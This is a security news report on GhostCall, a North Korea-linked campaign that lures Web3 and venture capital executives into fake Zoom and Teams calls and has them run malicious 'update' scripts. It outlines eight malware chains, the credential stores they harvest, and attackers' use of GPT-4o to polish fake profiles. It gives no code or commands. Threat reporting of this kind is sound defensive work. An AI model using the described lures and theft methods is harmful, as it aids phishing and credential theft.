GhostCall Malware Campaign
Cybersecurity researchers have uncovered a sophisticated campaign targeting the Web3 and blockchain sectors, tracked as GhostCall. The operation is part of a broader North Korea-linked initiative called SnatchCrypto, active since at least 2017. The threat is attributed to the Lazarus Group sub-cluster BlueNoroff, also known by multiple aliases including APT38, CageyChameleon, CryptoCore, Genie Spider, Nickel Gladstone, Sapphire Sleet, and Stardust Chollima.
Victims of the campaign have been identified across multiple macOS hosts in Japan, Italy, France, Singapore, Turkey, Spain, Sweden, India, and Hong Kong.
Table of Contents
Sophisticated Social Engineering and Phishing Techniques
GhostCall focuses heavily on macOS devices of executives in tech companies and venture capital firms. Attackers directly contact targets via platforms like Telegram, inviting them to investment-related meetings hosted on Zoom-like phishing websites.
Key aspects of the attack:
- Victims join fake calls containing genuine recordings of other victims instead of deepfakes.
- During the call, users are prompted to 'update' Zoom or Teams via a malicious script.
- The script downloads ZIP files that initiate multi-stage infection chains on the host.
The campaign has been active since mid-2023, likely following the RustBucket campaign, which marked the group's strategic pivot to macOS-focused attacks. Subsequent malware families deployed include KANDYKORN, ObjCShellz, and TodoSwift.
Deceptive Fake Zoom and Teams Pages
Targets landing on the GhostCall phishing pages initially see an illusion of a live call, which shortly triggers an error message. The message prompts users to download a Zoom or Teams Software Development Kit (SDK) to continue the call.
- On macOS, clicking 'Update Now' downloads a malicious AppleScript.
- On Windows, attackers use the ClickFix technique to execute a PowerShell command.
- Every interaction with the fake site is tracked, allowing attackers to monitor victim behavior.
The campaign has since expanded from Zoom to Microsoft Teams, using TeamsFx SDK downloads to continue the infection chain.
Malware and Infection Chains
Regardless of the platform, the AppleScript installs phony Zoom or Teams apps and downloads DownTroy, which harvests passwords from password managers and installs additional malware with root privileges. GhostCall leverages eight distinct attack chains, including:
ZoomClutch / TeamsClutch – Swift-based implant masquerading as Zoom or Teams; prompts system passwords for exfiltration.
DownTroy v1 – Go-based dropper launches AppleScript-based DownTroy to download additional scripts until reboot.
CosmicDoor – C++ loader (GillyInjector) injects a Nim backdoor; capable of destructive file wiping; downloads SilentSiphon.
RooTroy – Nimcore loader injects Go backdoor for device reconnaissance and malware execution.
RealTimeTroy – Nimcore loader injects Go backdoor; communicates via WSS protocol for file and system control.
SneakMain – Nim payload executed via Nimcore loader to run additional AppleScript commands.
DownTroy v2 – CoreKitAgent dropper launches AppleScript-based DownTroy (NimDoor) to retrieve additional scripts.
SysPhon – C++ downloader from RustBucket lineage; used for reconnaissance and binary retrieval.
Additionally, SilentSiphon harvests sensitive data from:
- Apple Notes, Telegram, web browser extensions, password managers
- Developer and cloud platforms: GitHub, GitLab, Bitbucket, npm, Yarn, Python pip, RubyGems, Rust cargo, NET Nuget, AWS, Google Cloud, Microsoft Azure, Oracle Cloud, Akamai, Linode, DigitalOcean, Vercel, Cloudflare, Netlify, Stripe, Firebase, Twilio, CircleCI, Pulumi, HashiCorp
- Blockchain platforms: Sui, Solana, NEAR, Aptos, Algorand
- System tools: Docker, Kubernetes, OpenAI
Reconnaissance via Fabricated Meetings
The video feeds in fake meetings were recorded by attackers, while profile images of participants were sourced from professional networks such as LinkedIn, Crunchbase, or X (Twitter). Some images were enhanced using GPT-4o, adding a layer of realism to the social engineering ruse.
GhostCall exemplifies the evolution of cyber threats targeting executives in Web3 and venture capital, combining advanced social engineering, cross-platform malware, and sophisticated data harvesting techniques. Vigilance and multi-layered defenses are critical to counter these North Korea-linked campaigns.
